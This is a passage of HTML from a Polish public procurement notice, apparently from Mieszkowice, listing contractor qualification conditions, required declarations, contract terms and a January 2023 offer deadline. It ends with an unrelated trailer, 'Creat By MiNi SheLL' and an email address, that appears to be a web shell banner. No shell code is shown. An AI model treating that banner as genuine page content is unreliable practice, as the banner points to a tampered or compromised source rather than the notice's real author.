class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym- Zamawiający nie stawia warunku<br/>w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów-<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej- Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej- Zamawiający nie stawia warunku w powyższym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności<br/>informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie art.<br/>108 ust. 1 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. , – wzór stanowi załącznik nr 3 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykaz dokumentów składających się na ofertę:<br/>1) formularz ofertowy – zgodnie ze wzorem stanowiącym załącznik nr 1 do SWZ;<br/>2) oświadczenie wykonawcy wskazujące części zamówienia, których wykonanie zamierza powierzyć podwykonawcom, wraz<br/>z podaniem nazw ewentualnych podwykonawców, jeżeli są już znani – zgodnie ze wzorem stanowiącym załącznik nr 1 do<br/>SWZ;<br/>3) oświadczenie wykonawcy składane na podstawie art. 117 ust. 4 ustawy Pzp (w przypadku wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia) – zgodnie ze wzorem stanowiącym załącznik nr 1 do SWZ;<br/>4) oświadczenie, o którym mowa w art. 125 ust. 1, składane na podstawie art. 273 ust. 2 ustawy Pzp, zgodnie ze wzorem<br/>stanowiącym załącznik nr 2 do SWZ, w następującym zakresie:<br/>a) spełniania warunków udziału w postępowaniu określonych przez zamawiającego<br/>b) wstępnego potwierdzenia braku podstaw wykluczenia z postępowania na podstawie art. 108 ust. 1) ustawy Pzp;<br/>5) Odpowiednie pełnomocnictwo lub inne dokumenty potwierdzające umocowanie do reprezentowania wykonawcy, gdy w<br/>imieniu wykonawcy działa osoba, której umocowanie nie wynika z dokumentów takich jak odpis lub informacja z KRS,<br/>CEiDG, lub innego właściwego rejestru, z zastrzeżeniem § 13 ust. 1 i 2 Rozporządzenia Ministra Rozwoju, Pracy i<br/>Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (t.j. Dz. U. 2020 poz. 2415. Powyższe ma zastosowanie<br/>również do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>6) zobowiązanie i oświadczenie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, jeżeli wykonawca w celu potwierdzenia<br/>spełniania warunków udziału w postępowaniu, zamierza polegać na zdolnościach innych podmiotów. Wzór dokumentu<br/>stanowi załącznik nr 4 do SWZ; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z projektem umowy, który stanowi załącznik nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-11 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie ofert za pośrednictwem strony https://platformazakupowa.pl/pn/mieszkowice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-11 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający nie wymaga złożenia dokumentów, o których mowa w § 4 Rozporządzenia Ministra Rozwoju, Pracy i<br/>Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy

Creat By MiNi SheLL
Email: jattceo@gmail.com